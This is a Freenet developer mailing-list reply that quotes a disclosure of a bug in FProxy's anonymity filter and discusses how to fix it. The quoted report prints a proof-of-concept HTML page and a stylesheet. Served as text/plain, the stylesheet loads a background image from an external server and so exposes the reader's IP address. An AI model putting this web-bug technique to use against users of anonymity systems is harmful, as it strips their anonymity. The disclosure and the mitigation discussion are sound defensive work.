>
> After reading Cruft's short blurb about external CSS style sheets, I hacked
> around to see if FProxy would accept external style sheets.
>
> Inserting the style sheets as *.css doesn't work, because FProxy doesn't
> recognise the content-type as safe and trips the anonymity filter.
> Inserting them as text/plain does work, though.
>
> In fact, it does work so well that one can specify an external background
> image in the stylesheet and FProxy doesn't warn the user. CSS-capable
> browsers will parse the stylesheet and fetch the background image from the
> WWW server, thus compromising the user's anonymity.
>
> I've inserted two keys to demonstrate this:
>
> freenet:KSK at css_web_bug.txt
> freenet:KSK at css_web_bug.html
>
> The demonstration will attempt to contact my site
> (http://nightwatch.mine.nu) for the external image.
>
> Here's the files in plaintext for those who don't want their ip to show up
> on my server logs:
>
> - --css_web_bug.html--
> <html>
> <head>
> <title>Blah</title>
> <link rel="stylesheet" type="text/css" href="/KSK at css_web_bug.txt">
Does the type= attribute occur in any other tag? Have you looked at
XPath etc? Some of the XML stuff allows arbitrary inlining... does it
have a type= switch?
> </head>
> <body>
> <h1>Foo</h1>
> Foo
> <h2>Bar</h2>
> </body>
> </html>
> - --css_web_bug.html--
>
> - --css_web_bug.txt--
> body {
> color: white;
> background: url(http://nightwatch.mine.nu/graphics/back.gif);
Is this the only way to specify a URL in CSS code? Inline CSS should be
reasonably easy to filter if so.
> }
> - --css_web_bug.txt--
>
> - --
> Mika Hirvonen <hirvox at welho.com>
> http://nightwatch.mine.nu
>
Nice.. a major pain. It would be really annoying to have to block all
CSS, so we end up parsing the inline style sheet before we let them have
the page (since it might already be in the browser's cache, eg from a node
restart, or invisible inlining as another format etc)... worse, what if
the browser reloads the stylesheet and gets a later edition? Not allowing
external stylesheets undermines the C in CSS, but it may be the only
practical solution, short of a special browser or browser switch.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
URL:
<https://emu.freenetproject.org/pipermail/devl/attachments/20020901/3e3fa2cb/attachment.pgp>
